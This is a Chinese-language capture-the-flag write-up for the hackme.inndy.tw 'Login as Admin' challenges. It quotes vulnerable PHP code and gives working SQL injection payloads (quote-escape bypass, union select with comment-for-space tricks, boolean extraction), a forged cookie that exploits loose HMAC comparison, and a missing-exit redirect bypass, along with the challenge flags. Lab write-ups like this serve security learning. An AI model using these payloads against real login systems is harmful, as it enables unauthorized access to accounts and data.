hackme.inndy.tw/scoreboard/ WriteUp
login as admin 0
过滤函数:
function safe_filter($str)
{
$strl = strtolower($str);
if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') ||
strstr($strl, 'update') || strstr($strl, 'delete')
) {
return '';
}
return str_replace("'", "\\'", $str);
}
查询语句:
$connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
$db = new PDO($connection_string, DB_USER, DB_PASS);
$sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
$_POST['name'],
$_POST['password']
过滤函数中转义了单引号,而数据库使用utf8,无法使用宽子节注入。尝试把转义符转义。
SELECT * FROM user WHERE user = 'admin' AND password = ' \'or 1--+ '
name = admin
password = 'or 1--+,失败
password = 'or 2=2%23,登陆成功,提示 “
Hi, guest
You are not admin!
”
说明用户名为admin的用户 $user->is_admin 字段不为 1,需要查询is_admin字段为1的用户
'union select 1,2,3,4
Hi, 2
You are admin!
FLAG{' UNION SELECT "I Know SQL Injection" #}, flag2 in the database!
得到了flag1,同时发现union注入的回显位置是2,flag2在数据库中
union注入表名,发现隐藏表:
h1dden_f14g
字段名:the_f14g
union select 1,the_f14g,3,4 from h1dden_f14g #,得到flag2
FLAG{Good, Union select is quite easy to exploit!}
Login as Admin 1
过滤函数如下:
function safe_filter($str)
{
$strl = strtolower($str);
if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") ||
strstr($strl, 'union select') || strstr($strl, 'select ')
) {
return '';
}
return str_replace("'", "\\'", $str);
}
$_POST = array_map(safe_filter, $_POST);
用 /**/ 代替空格,使用union注入:
name=%5C%27union%2F\*\*%2Fselect%2F\*\*%2F1%2C2%2C3%2C4%2F**%2F%23&password=123
得到flag1:
<h3>Hi, \\'union/**/select/**/1,2,3,4/**/#</h3>
<h4>You are admin!</h4>
<code>FLAG{He110, Admin\\' or 1337 < 314159 #}</code>, flag2 in the database!
提示flag2在数据库中,而没有回显位置,考虑使用bool注入。
login_as_admin1
0bdb54c98123f5526ccaed982d2006a9,users
id,4a391a11cfa831ca740cf8d00782f3a6,id,name,password,isadmin
FLAG{W0W,Youfoundthecorrecttableandtheflag,andUserAgent}
Login as Admin 3
查看源码反,容易看穿本题不是sql注入题,而是一道限制条件绕过题。
关键代码如下:
function load_user()
{
global $secret, $error;
if(empty($_COOKIE['user'])) {
return null;
}
$unserialized = json_decode(base64_decode($_COOKIE['user']), true);
$r = hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig'];
if(hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']) {
$error = 'Invalid session';
return false;
}
$data = json_decode($unserialized['data'], true);
return [
'name' => $data[0],
'admin' => $data[1]
];
}
用guest用户登录,查看cookie并解码:
{"sig":"75d53f97acd211098a052b305d1caf191436c6d29d1936d947f8fde7733008a3968edaa4b4a68242db8696030505273914ded688d459e8c9225200d729a0b98e","data":"["guest",false]"}
改为:
{"sig":0,"data":"["guest",false]"} 并base64编码,可绕过
得到
FLAG{H3110, 4dm1n1576a70r... 1f y0u kn0w my 53cR37 and Use STRONG COMPARE pls}
关键代码:
if($_POST['name'] === 'admin') {
if($_POST['password'] !== $password) {
// show failed message if you input wrong password
header('Location: ./?failed=1');
}
}
<?php if($_POST['name'] === 'admin'): /* login success! */ ?>
问题出在判断密码错误后进行了重定向,但没有exit,后续代码仍可运行。
burpsuite抓包得到FLAG:
FLAG{Remember add exit after redirection..}
